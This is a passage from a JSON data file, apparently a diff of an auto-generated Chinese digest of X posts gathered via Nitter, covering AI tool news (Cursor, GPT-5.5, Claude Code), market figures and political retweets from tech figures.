(@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/bozhou_ai/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "gkxspace", + "account": "@gkxspace", + "name": "余温", + "title": "RT by @gkxspace: Cursor官方认证博主✅ 你值得关注\n\n11位晒Cursor $10,000额度博主,按X发帖时间大致排序\n\n1️⃣ 铁锤人 (@lxfater)\n 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人\n \n推文链接:https://x.com/lxfater/status/2047738439823733097\n\n2️⃣ 雪踏乌云 (@Pluvio9yte)\n 简介:聚焦 AI & Vibe coding & Prompt & Agent,大厂创业产品(年固定收入7位数),分享AI编程&出海干货\n \n推文链接:https://x.com/Pluvio9yte/status/2047768818702069974\n\n3️⃣ 比特币橙子Trader (@oragnes)\n 简介:Bitcoin Holder | Crypto Investor & Research | AI | OpenClaw | VibeCoding\n \n推文链接:https://x.com/oragnes/status/2047843289571942533\n\n4️⃣ 凡人小北 (@frxiaobei)\n 简介:行道途中。在真实业务与组织中持续验证 AI 的价值与边界 | 个人IP|商业与管理|AI 咨询\n \n推文链接:https://x.com/frxiaobei/status/2047846324771713490\n\n5️⃣http://Berryxia.AI (@berryxia)\n 简介:Building AI tools | AI System Prompt | Love Design & Coding & Share Prompt\n \n推文链接:https://x.com/berryxia/status/2047845995220988355\n\n6️⃣奶昔 (@realNyarime)\n 简介:乃月希 aka Nyarime|Founder of Naixi Networks|Developer|Photographer\n \n推文链接:https://x.com/realNyarime/status/2047834820169146559\n\n7️⃣Ding (@dingyi)\n 简介:promote your product(产品推广专家)\n \n推文链接:https://x.com/dingyi/status/2047834056734437561\n\n8️⃣CuiMao (@CuiMao)\n 简介:AI Developer / NVIDIA YES / 深度学习 / 不接广告\n 推文链接:https://x.com/CuiMao/status/2047875131113111770\n\n9️⃣Leo (@runes_leo)\n 简介:预测市场策略 · AI 工具实战 · 独立构建日常 | Prediction markets × AI tools\n \n推文链接:https://x.com/runes_leo/status/2047874815399502287\n\n🔟泊舟 (@bozhou_ai)\n 简介:AI 程序员 & Vibe 编码者 | 构建 Agent、系统提示与高效流程 | AI中转站创业中\n \n推文链接:https://x.com/bozhou_ai/status/2047847486430286317\n\n🔟1️⃣Jason Zhu (@GoSailGlobal)\n 简介:独立开发,SaaS出海,AI价值内容分享 | GoSail Lab(MCN Founder,承接产品推广)\n\n 推文链接:https://x.com/GoSailGlobal/status/2047887839791345678", + "url": "https://x.com/gkxspace/status/2047891848908472433", + "published_at": "2026-04-25T04:13:59+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "卧槽,收到 Cursor 送的 10,000u AI 额度! \n\n昨天 @edwinarbus 联系我送额度的时候,我还以为是骗子。不过挂着 cursor 的标,而且只是要个邮箱,我抱着试一试的态度回复了,没想道还真送了!\n这个月要多 vibe coding 些狗屎了! @VibeShit_Org @cursor_ai", + "url": "https://x.com/0xAA_Science/status/2047889676867080420", + "published_at": "2026-04-25T04:05:21+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: Incredible return on investment! 💰💰💰", + "url": "https://x.com/DavidSacks/status/2047877294476116184", + "published_at": "2026-04-25T03:16:09+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "R to @wolfyxbt: 为了利于大家分析,这里发一下我自己的后台数据", + "url": "https://x.com/wolfyxbt/status/2047877064104284194", + "published_at": "2026-04-25T03:15:14+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.", + "url": "https://x.com/DavidSacks/status/2047871382923469241", + "published_at": "2026-04-25T02:52:39+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.", + "url": "https://x.com/DavidSacks/status/2047867592790946189", + "published_at": "2026-04-25T02:37:36+00:00", + "source": "nitter" + }, + { + "handle": "wolfyxbt", + "account": "@wolfyxbt", + "name": "杀破狼", + "title": "卧槽!牛逼牛逼!\n\n这两周的工资涨到了 1799 美金!\n\nThank you Elon Musk!", + "url": "https://x.com/wolfyxbt/status/2047865010182148284", + "published_at": "2026-04-25T02:27:20+00:00", + "source": "nitter" + }, + { + "handle": "svwang1", + "account": "@svwang1", + "name": "王川(硅谷)", + "title": "自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 \n\n2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。", + "url": "https://x.com/svwang1/status/2047858045057909226", + "published_at": "2026-04-25T01:59:39+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Cursor大善人,我也已经领到了,在X上获得的最大一笔收入", + "url": "https://x.com/bozhou_ai/status/2047847486430286317", + "published_at": "2026-04-25T01:17:42+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.”\n\nJASON: “What would happen if Kamala ‘Ding Dong’ was in right now?”\n\nSACKS: “We'd have no data centers, they'd be using AI to censor us, and they'd be promoting DEI values through AI.”", + "url": "https://x.com/DavidSacks/status/2047842000632713369", + "published_at": "2026-04-25T00:55:54+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening.\n\n@Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"\n\n@DavidSacks \"We'd have no data centers, and they'd be using AI to censor us, and they'd be promoting DEI values through AI. That was in the Biden executive order.\n\nPresident Trump just wants the country to win and be successful.", + "url": "https://x.com/DavidSacks/status/2047823154655932696", + "published_at": "2026-04-24T23:41:01+00:00", + "source": "nitter" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "RT by @DavidSacks: POD UP! Core four is back 🚨\n\nBig show:\n\n-- SpaceX-Cursor deal, using compute as leverage\n\n-- SaaS debt bomb coming to PE?, venture debt risk\n\n-- Software bloodbath, buy low potential?\n\n-- New Apple CEO: future of the company\n\n-- SPLC indictment, major allegations, out of control NGOs\n\n-- Science Corner returns! Colon cancer cause discovered?\n\n(0:00) Bestie intros!\n\n(4:55) SpaceX-Cursor deal, compute as leverage\n\n(18:33) SaaS bloodbath, debt bomb incoming, buy the dip?\n\n(46:20) New Apple CEO: John Ternus succeeds Tim Cook, what's next for Apple?\n\n(1:00:32) SPLC indictment, out of control NGOs\n\n(1:19:03) Science Corner: Potential cause discovered for colon cancer spike in young people", + "url": "https://x.com/DavidSacks/status/2047808256047821141", + "published_at": "2026-04-24T22:41:49+00:00", + "source": "nitter" + }, + { + "handle": "AravSrinivas", + "account": "@AravSrinivas", + "name": "Aravind Srinivas", + "title": "You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being credits/token hungry). GPT 5.5 is more token-efficient in subagent orchestration.", + "url": "https://x.com/AravSrinivas/status/2047788775468908840", + "published_at": "2026-04-24T21:24:24+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download", + "url": "https://x.com/cursor_ai/status/2047764656165646786", + "published_at": "2026-04-24T19:48:34+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes.\n\nA single agent session can now target a reusable workspace made of multiple folders.", + "url": "https://x.com/cursor_ai/status/2047764654760632725", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window.\n\nRun isolated tasks in the background across different branches. When you're ready to test changes, move any branch into your local foreground with one click.", + "url": "https://x.com/cursor_ai/status/2047764652977958938", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + }, + { + "handle": "cursor_ai", + "account": "@cursor_ai", + "name": "Cursor", + "title": "Introducing /multitask in the new Cursor 3 interface.\n\nCursor can now run async subagents to parallelize your requests instead of adding them to the queue.\n\nFor already queued messages, you can ask Cursor to multitask on them instead of waiting for the current run to finish.", + "url": "https://x.com/cursor_ai/status/2047764651363180839", + "published_at": "2026-04-24T19:48:33+00:00", + "source": "nitter" + } + ], + "headline": "GPT-5.5发布会定档;Cursor SDK开放;Karpathy:Software 3.0拐点已至", + "trending_keywords": [ + "GPT-5.5", + "Cursor SDK", + "Software 3.0", + "Claude Code优化", + "纳斯达克25000" + ], + "top_themes": [ + { + "title": "其他", + "count": 321 + }, + { + "title": "模型能力", + "count": 113 + }, + { + "title": "算力与芯片", + "count": 23 + }, + { + "title": "交易与市场", + "count": 16 + }, + { + "title": "投融资与并购", + "count": 5 + } + ], + "modules": { + "headline": "GPT-5.5发布会定档;Cursor SDK开放;Karpathy:Software 3.0拐点已至", + "trending_keywords": [ + "GPT-5.5", + "Cursor SDK", + "Software 3.0", + "Claude Code优化", + "纳斯达克25000" + ], + "themes": [ + { + "id": "t1", + "title": "Sam Altman亲承:OpenAI没有护城河,GPT-5.5发布会定档5月5日", + "subtitle": "Altman称AI的switching costs正在崩塌,宣布GPT-5.5-Cyber网络安全模型即将上线", + "priority": "P0", + "bullets": [ + "Sam Altman:希望OpenAI做\"forever low margin\"公司,类比水电煤公用事业", + "Switching costs正在崩塌,Altman认为AI真正价值是\"省掉不该做的事\"而非\"把某件事做得更好\"", + "GPT-5.5发布会定档5月5日5:55 PM,GPT-5.5-Cyber前沿网络安全模型即将向关键网络防御者推出" + ], + "samples": [ + { + "text": "use codex or claude code, whatever works best for you", + "url": "https://x.com/sama/status/2050274547061129577", + "handle": "sama", + "date": "2026-05-01" + }, + { + "text": "Switching costs are collapsing in AI.", + "url": "https://x.com/sama/status/2049653810558353746", + "handle": "sama", + "date": "2026-05-01" + }, + { + "text": "Sam Altman 在和 Stripe 联合创始人 Patrick Collison 的访谈里亲口承认:OpenAI 没有护城河,而且永远不会有。", + "url": "https://x.com/Pluvio9yte/status/2050221337424408733", + "handle": "Pluvio9yte", + "date": "2026-05-01" + } + ] + }, + { + "id": "t2", + "title": "Cursor SDK正式开放:可构建自定义背景Agent", + "subtitle": "Cursor面向Teams和Enterprise推出Security Review,支持自定义安全Agent", + "priority": "P0", + "bullets": [ + "Cursor SDK发布:可使用Cursor相同的runtime、harness和模型构建Agent", + "开源三个 starter projects:coding agent CLI、prototyping tool、agent-powered kanban board", + "Cursor Security Review现支持Teams和Enterprise:PR漏洞检查 Agent + 漏洞追踪 Agent" + ], + "samples": [ + { + "text": "Announcing Cursor SDK: Build agents with the same runtime, harness, and models as Cursor.", + "url": "https://x.com/cursor_ai/status/2049499866217185492", + "handle": "cursor_ai", + "date": "2026-05-01" + }, + { + "text": "Cursor Security Review for Teams and Enterprise is now available.", + "url": "https://x.com/cursor_ai/status/2049926283061035254", + "handle": "cursor_ai", + "date": "2026-05-01" + } + ] + }, + { + "id": "t3", + "title": "Karpathy:AI编程拐点已至,Software 3.0时代来临", + "subtitle": "在Sequoia AI Ascent 2026峰会上提出Software 1.0/2.0/3.0范式演进", + "priority": "P0", + "bullets": [ + "2025-12是拐点:生成代码块变大变连贯,编程最小单位从\"写代码\"升级到\"委派任务\"", + "神经网络正成为主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "验证性成为新瓶颈:能生成代码≠能生成正确、安全、可维护的软件" + ], + "samples": [ + { + "text": "Karpathy:2025-12是AI编程拐点,Software 3.0时代来临", + "url": "https://x.com/Pluvio9yte/status/2050059618043543563", + "handle": "Pluvio9yte", + "date": "2026-05-01" + }, + { + "text": "神经网络会成主计算层,未来不是CPU上跑神经网络,是神经网络当主进程", + "url": "https://x.com/runes_leo/status/2050096487967695197", + "handle": "runes_leo", + "date": "2026-05-01" + } + ] + } + ], + "p0_events": [ + { + "id": "p01", + "title": "Claude Code大更新:/resume提速67%,MCP支持并发连接", + "meta": "runes_leo", + "summary": "Claude Code针对长session进行专项优化:/resume在40MB+ session上提速67%,50MB的/branch上限提升;MCP servers改为并发连接,启动不再卡在最慢那个", + "url": "https://x.com//status/2050229609795407876", + "handle": "runes_leo", + "date": "2026-05-01" + }, + { + "id": "p02", + "title": "纳斯达克首次突破25000点", + "meta": "charliebilello", + "summary": "纳斯达克指数首次站上25000点大关,一年 ago为18000,5年前14000,10年前4800", + "url": "https://x.com//status/2050210847650132146", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p03", + "title": "NVIDIA过去10年涨幅22875%,比特币17205%", + "meta": "charliebilello", + "summary": "过去10年资产回报率对比:NVIDIA+22875%,比特币+17205%,AMD+10030%,Tesla+2362%,苹果+1233%", + "url": "https://x.com//status/2050263578188333549", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p04", + "title": "美国汽油价格创30年最大涨幅", + "meta": "charliebilello", + "summary": "美国汽油价格升至4.39美元/加仑,为2022年7月以来最高,过去9周从2.98涨至4.39,涨幅47%为30年最大", + "url": "https://x.com//status/2050196201014718675", + "handle": "charliebilello", + "date": "2026-05-01" + }, + { + "id": "p05", + "title": "Anthropic发布BioMysteryBench:Claude在生物信息学领域突破", + "meta": "Pluvio9yte", + "summary": "BioMysteryBench将99个来自真实研究的生物信息学难题交给AI,Claude Mythos Preview搞定30%硬骨头,Opus 4.6准确率81%", + "url": "https://x.com//status/2050063821377810451", + "handle": "Pluvio9yte", + "date": "2026-05-01" + }, + { + "id": "p06", + "title": "OpenAI Codex升级:非编程计算机工作提速42%", + "meta": "sama", + "summary": "Codex今日重大升级:Computer Use运行速度提升42%,支持非编程计算机工作", + "url": "https://x.com//status/2049946120441520624", + "handle": "sama", + "date": "2026-05-01" + } + ], + "top_quotes": [ + { + "id": "q1", + "quote": "Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a market you despise.", + "speaker": "Paul Graham", + "date": "2026-05-01", + "note": "Sam Altman转发", + "url": "https://x.com/Paul Graham/status/2050233324963008553", + "handle": "paulg" + }, + { + "id": "q2", + "quote": "we want to build tools to augment and elevate people, not entities to replace them.", + "speaker": "Sam Altman", + "date": "2026-05-01", + "note": "Altman回应AI导致失业担忧", + "url": "https://x.com/Sam Altman/status/2050229058425045178", + "handle": "sama" + }, + { + "id": "q3", + "quote": "All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned.", + "speaker": "Yann LeCun", + "date": "2026-05-01", + "note": "LeCun再次力挺开源,炮轰AI限制派", + "url": "https://x.com/Yann LeCun/status/2050162348891979817", + "handle": "ylecun" + } + ], + "category_updates": [ + { + "id": "c1", + "title": "AI编程工具", + "subtitle": "Cursor SDK开放构建自定义Agent", + "level": "P0", + "items": [] + }, + { + "id": "c2", + "title": "模型与产品", + "subtitle": "GPT-5.5发布会定档", + "level": "P0", + "items": [ + { + "text": "GPT-5.5-Cyber网络安全模型即将推出", + "url": "https://x.com//status/2049712078836170843" + } + ] + }, + { + "id": "c3", + "title": "投资与宏观", + "subtitle": "纳斯达克里程碑+能源价格飙升", + "level": "P1", + "items": [] + }, + { + "id": "c4", + "title": "AI研究突破", + "subtitle": "Karpathy Software 3.0 + Anthropic生物Bench", + "level": "P1", + "items": [] + }, + { + "id": "c5", + "title": "开源与生态", + "subtitle": "LeCun再杠开源限制", + "level": "P2", + "items": [ + { + "text": "匿名实验:Claude Code对含特定关键词的仓库报错\"out of extra usage\"", + "url": "https://x.com//status/2050127414630469937" + } + ] + }, + { + "id": "c6", + "title": "华语圈热点", + "subtitle": "中文博主实操分享", + "level": "P2", + "items": [ + { + "text": "铁锤人:Apple Support App用Claude Code打包", + "url": "https://x.com//status/2050240636020732015" + }, + { + "text": "0xAA:Cursor额度$150已用光,正在找循环任务消耗剩余$10000额度", + "url": "https://x.com//status/2050244250563182801" + } + ] + } + ], + "risk_signals": [ + { + "id": "r1", + "level": "MID", + "title": "Gary Marcus:AI对齐尚未解决,大规模部署风险极高", + "detail": "Marcus认为从LLM获取真正对齐是痴心妄想,在没有健壮解决方案的情况下大规模部署LLM极其危险", + "url": "https://x.com/GaryMarcus/status/2050296366161940584" + }, + { + "id": "r2", + "level": "MID", + "title": "Gary Marcus:AI对GDP的贡献类似\"挖坑填坑\"", + "detail": "引用David Sacks观点:付钱让人挖坑再填回去GDP也会涨,AI当前对GDP的贡献可能同样没有真正价值", + "url": "https://x.com/GaryMarcus/status/2050284439343862266" + }, + { + "id": "r3", + "level": "OPP", + "title": "用户隐私争议再起", + "detail": "Gary Marcus:Meta就是Black Mirror的化身,用户隐私问题持续引发担忧", + "url": "https://x.com/GaryMarcus/status/2050275183223857462" + } + ] + }, + "tweet_summary_md": "# X平台关注列表推文汇总\n\n**生成日期**: 2026-05-01T19:38:36.469180+00:00\n**数据来源**: Nitter RSS 订阅\n**时间范围**: 最近7天\n**账号总数**: 44 | **成功获取**: 34 | **推文总数**: 478\n\n---\n\n### ✅ @karpathy — Andrej Karpathy(3 条)\n\n**[2026-04-30T17:43:06+00:00]**\n> This is the the quote I've been citing a lot recently.\n[原文链接](https://x.com/karpathy/status/2049907410303865030)\n\n**[2026-04-30T17:28:50+00:00]**\n> Fireside chat at Sequoia Ascent 2026 from a ~week ago. Some highlights: The first theme I tried to push on is that LLMs are about a lot more than just speeding up what existed before (e.g. coding). T…\n[原文链接](https://x.com/karpathy/status/2049903821095354523)\n\n**[2026-04-27T21:34:34+00:00]**\n> RT by @karpathy: New work with @AlecRad and @DavidDuvenaud: Have you ever dreamed of talking to someone from the past? Introducing talkie, a 13B model trained only on pre-1931 text. Vintage models sh…\n[原文链接](https://x.com/karpathy/status/2048878495539843211)\n\n---\n\n### ✅ @sama — Sam Altman(20 条)\n\n**[2026-05-01T18:01:58+00:00]**\n> you know what all of these \"which is better\" polls are silly use codex or claude code, whatever works best for you i am grateful we live in a time with such amazing tools, and grateful there is a cho…\n[原文链接](https://x.com/sama/status/2050274547061129577)\n\n**[2026-05-01T15:18:10+00:00]**\n> RT by @sama: Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great…\n[原文链接](https://x.com/sama/status/2050233324963008553)\n\n**[2026-05-01T15:01:14+00:00]**\n> R to @sama: i'm hopeful for a future where people who want to work really hard have incredibly fulfilling things to do, and people who don't want to work hard don't have to and can still have an amaz…\n[原文链接](https://x.com/sama/status/2050229060887044494)\n\n**[2026-05-01T15:01:13+00:00]**\n> R to @sama: i think a lot of people are going to be busier (and hopefully more fulfilled) than ever, and jobs doomerism is likely long-term wrong. though of course there will be disruption/significan…\n[原文链接](https://x.com/sama/status/2050229059507159242)\n\n**[2026-05-01T15:01:13+00:00]**\n> we want to build tools to augment and elevate people, not entities to replace them.\n[原文链接](https://x.com/sama/status/2050229058425045178)\n\n**[2026-05-01T01:17:03+00:00]**\n> artificial goblin intelligence achieved\n[原文链接](https://x.com/sama/status/2050021650641695108)\n\n**[2026-04-30T20:16:55+00:00]**\n> big upgrade for codex today! try it for non-coding computer work.\n[原文链接](https://x.com/sama/status/2049946120441520624)\n\n**[2026-04-30T20:12:24+00:00]**\n> it does seem cool\n[原文链接](https://x.com/sama/status/2049944981750833659)\n\n**[2026-04-30T19:23:47+00:00]**\n> RT by @sama: Computer Use runs this use case 42% faster in today's Codex app update.\n[原文链接](https://x.com/sama/status/2049932746567598472)\n\n**[2026-04-30T19:08:00+00:00]**\n> RT by @sama: It's never been easier to do everyday work with Codex. Choose your role, connect the apps you use every day, and try suggested prompts. Codex helps with everything from research and plan…\n[原文链接](https://x.com/sama/status/2049928776147230886)\n\n**[2026-04-30T17:29:15+00:00]**\n> lisan say more mean things about us you're being too nice\n[原文链接](https://x.com/sama/status/2049903925311267311)\n\n**[2026-04-30T05:56:16+00:00]**\n> RT by @sama: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a wi…\n[原文链接](https://x.com/sama/status/2049729530059960571)\n\n**[2026-04-30T04:59:15+00:00]**\n> alignment failure\n[原文链接](https://x.com/sama/status/2049715178611380317)\n\n**[2026-04-30T04:46:56+00:00]**\n> we're starting rollout of GPT-5.5-Cyber, a frontier cybersecurity model, to critical cyber defenders in the next few days. we will work with the entire ecosystem and the government to figure out trus…\n[原文链接](https://x.com/sama/status/2049712078836170843)\n\n**[2026-04-30T03:27:12+00:00]**\n> R to @sama: openai.com/index/where-the-g…\n[原文链接](https://x.com/sama/status/2049692014586048973)\n\n**[2026-04-30T03:27:08+00:00]**\n> goblinblog dropped\n[原文链接](https://x.com/sama/status/2049691999444639872)\n\n**[2026-04-30T03:18:22+00:00]**\n> RT by @sama: This GPT Image 2 prompt is going insanely viral right now. “Redraw the attached image in the most clumsy, scribbly, and utterly pathetic way possible. Use a white background, and make it…\n[原文链接](https://x.com/sama/status/2049689793118998717)\n\n**[2026-04-30T00:55:24+00:00]**\n> R to @sama: we will have it at our SF HQ and pay for plane tickets & hotel for people who aren't local. we'll close the link tomorrow at 5:55 pm.\n[原文链接](https://x.com/sama/status/2049653814463168638)\n\n**[2026-04-30T00:55:23+00:00]**\n> GPT-5.5 is going to have a party for itself. it chose 5/5 at 5:55 pm for the date and time. if you'd like to come, let us know here: https://luma.com/5.5 codex will help the team pick people from the…\n[原文链接](https://x.com/sama/status/2049653810558353746)\n\n**[2026-04-29T14:19:33+00:00]**\n> R to @sama: i meant a goblin moment, sorry\n[原文链接](https://x.com/sama/status/2049493797114126484)\n\n---\n\n### ✅ @DarioAmodei — Dario Amodei(0 条)\n\n---\n\n### ✅ @AravSrinivas — Aravind Srinivas(7 条)\n\n**[2026-05-01T03:22:08+00:00]**\n> Computer plays the orchestra\n[原文链接](https://x.com/AravSrinivas/status/2050053128452456584)\n\n**[2026-05-01T03:04:54+00:00]**\n> Video\n[原文链接](https://x.com/AravSrinivas/status/2050048790908785072)\n\n**[2026-04-30T17:42:35+00:00]**\n> RT by @AravSrinivas: The best hedge fund PMs compare views from different research analysts. Now you can do that in 2 minutes with Equity Research Council in Perplexity Computer. This workflow pulls …\n[原文链接](https://x.com/AravSrinivas/status/2049907277646160333)\n\n**[2026-04-28T16:05:11+00:00]**\n> RT by @AravSrinivas: Today we’re rolling out a new native Comet experience for iPad. Comet now works naturally with iPadOS features like multiple windows and Split View, so you can work with Comet al…\n[原文链接](https://x.com/AravSrinivas/status/2049157990604025896)\n\n**[2026-04-28T15:38:49+00:00]**\n> R to @AravSrinivas: reddit.com/r/GeminiAI/commen…\n[原文链接](https://x.com/AravSrinivas/status/2049151356985040934)\n\n**[2026-04-28T15:38:28+00:00]**\n> A Google Earth + Flight Simulator, fully cooked by Perplexity Computer with Codex/CC as subagents inside it. GTA vibes.\n[原文链接](https://x.com/AravSrinivas/status/2049151268606894310)\n\n**[2026-04-24T21:24:24+00:00]**\n> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr…\n[原文链接](https://x.com/AravSrinivas/status/2047788775468908840)\n\n---\n\n### ✅ @AndrewYNg — Andrew Ng(2 条)\n\n**[2026-04-30T16:21:35+00:00]**\n> Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out. I'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current s…\n[原文链接](https://x.com/AndrewYNg/status/2049886895530967534)\n\n**[2026-04-27T15:58:13+00:00]**\n> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to…\n[原文链接](https://x.com/AndrewYNg/status/2048793852702757151)\n\n---\n\n### ✅ @cursor_ai — Cursor(12 条)\n\n**[2026-04-30T18:58:07+00:00]**\n> R to @cursor_ai: We’re continuing to improve the runtime, harness, and models powering Cursor Security Review for a strong out-of-the-box experience. Security agents draw from your existing usage poo…\n[原文链接](https://x.com/cursor_ai/status/2049926287439929475)\n\n**[2026-04-30T18:58:06+00:00]**\n> R to @cursor_ai: Customize these Cursor-managed security agents to match your team’s requirements. Adjust triggers, add your own instructions, give them custom tooling, and choose how outputs are sha…\n[原文链接](https://x.com/cursor_ai/status/2049926285518848093)\n\n**[2026-04-30T18:58:06+00:00]**\n> Cursor Security Review is now available for Teams and Enterprise plans. Run two types of always-on agents: 1. Security Reviewer checks every PR for vulnerabilities and leaves comments. 2. Vulnerabili…\n[原文链接](https://x.com/cursor_ai/status/2049926283061035254)\n\n**[2026-04-30T17:19:22+00:00]**\n> Our agent harness makes models inside Cursor faster, smarter, and more token-efficient. Here's how we test improvements to the harness, monitor and repair degradations, and customize it for different…\n[原文链接](https://x.com/cursor_ai/status/2049901436918436249)\n\n**[2026-04-29T14:43:43+00:00]**\n> R to @cursor_ai: Customers like Rippling, Notion, C3 AI, and Faire are using the Cursor SDK to build custom background agents, take bugs from ticket to merge-ready PR, and maintain self-healing codeb…\n[原文链接](https://x.com/cursor_ai/status/2049499876388454903)\n\n**[2026-04-29T14:43:42+00:00]**\n> R to @cursor_ai: We've open-sourced a few starter projects for you to build on: a coding agent CLI, a prototyping tool, and an agent-powered kanban board. Use Cursor to customize them for your use ca…\n[原文链接](https://x.com/cursor_ai/status/2049499874043830389)\n\n**[2026-04-29T14:43:42+00:00]**\n> R to @cursor_ai: With the Cursor SDK, you can run agents locally or deploy them in our cloud.\n[原文链接](https://x.com/cursor_ai/status/2049499871980200082)\n\n**[2026-04-29T14:43:40+00:00]**\n> We’re introducing the Cursor SDK so you can build agents with the same runtime, harness, and models that power Cursor. Run agents from CI/CD pipelines, create automations for end-to-end workflows, or…\n[原文链接](https://x.com/cursor_ai/status/2049499866217185492)\n\n**[2026-04-24T19:48:34+00:00]**\n> R to @cursor_ai: Download Cursor 3.2 to try these new features in the agents window: http://cursor.com/download\n[原文链接](https://x.com/cursor_ai/status/2047764656165646786)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: We've also added multi-root workspaces for cross-repo changes. A single agent session can now target a reusable workspace made of multiple folders.\n[原文链接](https://x.com/cursor_ai/status/2047764654760632725)\n\n**[2026-04-24T19:48:33+00:00]**\n> R to @cursor_ai: Another way to parallelize work is with new and improved worktrees in the agents window. Run isolated tasks in the background across different branches. When you're ready to test cha…\n[原文链接](https://x.com/cursor_ai/status/2047764652977958938)\n\n**[2026-04-24T19:48:33+00:00]**\n> Introducing /multitask in the new Cursor 3 interface. Cursor can now run async subagents to parallelize your requests instead of adding them to the queue. For already queued messages, you can ask Cur…\n[原文链接](https://x.com/cursor_ai/status/2047764651363180839)\n\n---\n\n### ✅ @ylecun — Yann LeCun(20 条)\n\n**[2026-05-01T10:36:08+00:00]**\n> RT by @ylecun: All the Doomers and hawks are lining up behind this distillation \"attack\" farce because they want to see open source banned. It's really as simple as that. They want to take away your …\n[原文链接](https://x.com/ylecun/status/2050162348891979817)\n\n**[2026-05-01T00:42:44+00:00]**\n> RT by @ylecun: I think the expression is “pulling the ladder”! All labs trained their models by distilling (at the very least distilling the web) which allowed them to become the fastest growing busi…\n[原文链接](https://x.com/ylecun/status/2050013015680995631)\n\n**[2026-04-30T11:02:45+00:00]**\n> RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱: ▶️demo: https://aidemos.atmeta.com/tribev2/ 📄paper: htt…\n[原文链接](https://x.com/ylecun/status/2049806660001022372)\n\n**[2026-04-30T06:58:24+00:00]**\n> RT by @ylecun: These folks are trying to ban open source. They're looking to take away your freedom to choose. They're also looking to take away the rights of businesses like Cursor to fine tune and …\n[原文链接](https://x.com/ylecun/status/2049745165665853742)\n\n**[2026-04-30T00:05:29+00:00]**\n> Trump's war on science.\n[原文链接](https://x.com/ylecun/status/2049641252287607241)\n\n**[2026-04-29T22:48:11+00:00]**\n> RT by @ylecun: Trump’s FCC chair, Brendan Carr, says he plans to punish and potentially revoke broadcast licenses for TV networks critical of the Trump administration: “I’d be surprised if we don’t g…\n[原文链接](https://x.com/ylecun/status/2049621796736180438)\n\n**[2026-04-29T20:43:08+00:00]**\n> RT by @ylecun: Science is how we’ve cured diseases and how we just sent four humans around the Moon. It’s a big reason why we’re the greatest country on Earth, but firing the National Science Board s…\n[原文链接](https://x.com/ylecun/status/2049590329871904801)\n\n**[2026-04-29T18:50:10+00:00]**\n> RT by @ylecun: This is what an impending midterm disaster looks like for Republicans. https://trib.al/eLV1GmR\n[原文链接](https://x.com/ylecun/status/2049561899189055901)\n\n**[2026-04-29T11:49:39+00:00]**\n> RT by @ylecun: \"A decade ago, AI was 